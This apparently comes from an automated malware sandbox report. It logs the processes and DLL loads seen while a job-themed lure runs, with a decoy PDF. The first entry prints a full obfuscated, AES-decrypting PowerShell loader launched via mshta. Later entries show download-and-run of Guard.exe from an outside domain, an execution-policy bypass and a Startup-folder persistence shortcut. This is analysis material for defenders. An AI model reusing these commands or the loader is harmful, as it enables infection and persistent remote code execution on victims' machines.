Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D9EA7ACBEED4C412BB6C4D4602CFC90CF615287E6C6555C8E0B6CEE3AACB66AFC773E9192903227F0CE014AE4A150CCCE925B6B22D440B7F3E392520613C07711AF2978A272709AFC70BEDE8C3201483207E66D3D483012204164092C58F5895F1B4B38C5CE831D1917AC33B6FF65EBC1F0946D72FFD582B689656A77B66A88C471D7DE4C8AAD142463BAC97A96E31AFC766F1FDD6B3267516F8027B807DBCDA9A77CC0B3EF0AFCA30DAE6A4A90E6590D26CF5960B3F113201E74E50BCC37179E67420FB07540AB18B8A281F6F6E1E0974AB449D8C5426F8776DCAD4AE3752D5ED8DD77E80E582F37E99699AC94D58A627C408F56A6BAB4FF2A4634255575F0A373CE9D4F81D7D85A6FDD69653A9ACD82342A04DE1D703FF55FD77C7093583E7A8DE7DD76FAA4FC7DC3AE525F2923AB6D03FA2CF6E1C0045EB1AE1B01FE2DCE5F0DF7AF916F7F3D8FFFCF35BA8DFEE6863AACCA2AF778D9372C039EF1AA4F66FE4C9A7B7E6B4B690EE8B5F365AFD2B94E0804532372C711FBB3284815793750781C1A32513D741D2441259E82D27F9EDAFE0F914EBC4098FCA1B2028271CE736D3BF191C47416E402EA4570B4E235E7AEE572814275E385B72FBB0EBB4E4A71440B44DF5AD9DD6C30D1FE13CF9470F4635440674E87C75280F2FD7AC139781FEE2CBD3BFB5E93BCAD4DAED74847E6BE4FD41C380DA9D3A7A21A32566CEC4C0BB9EAA0C494BAE968EB32720676452D8771B05F9FBED066BEEC71BED78275BC817D8373317584369A8DD60E296BA3A7576111EB07BB121D2FC9B92A15C9F813BAFBD25A0F89684CBA0692BCA686C8E2C8FC8B185E944941525012042EAF50007E259FC3ECD739FA2F61F6FB8325658A744B3E4DE0CED8D320510C3299CAE545C675E7E88D3B7A101C08FD1C8926471E91C6E79F62B497DD1CC8DD442A85E3C31FEB6E31E75149AA77C8D8B3DFE3CB4D3B9ED06691EE63BC9248DF964984D9E605967CD19AC1E1190D2B1FC8F1C2F12A7615AAF59A39ACFBDC1A5D1067B10A03DE63D10C8C973A264985FB7E40DC8D397B060C3C2144591271FF47D80C0C4EFD88E885F4D18CCA2CED83B8D1BD66297A6F61B3062A0F96F4B4DC0076B70FB8A8DD887142732D4A65A96B6FD7A0352D9488FAFF981B4E138BD5D5E350C18AD7F5DD70FB56686D79B20038823B95E423BC9AD64AA072C87E558C58E9D04720A12E07C3C08A91A0E105DC9FE126B797B360396173D676F52756A6E514D4757514A4D594F475365';function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1656,i,6298120100990453940,17586476426563717861,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
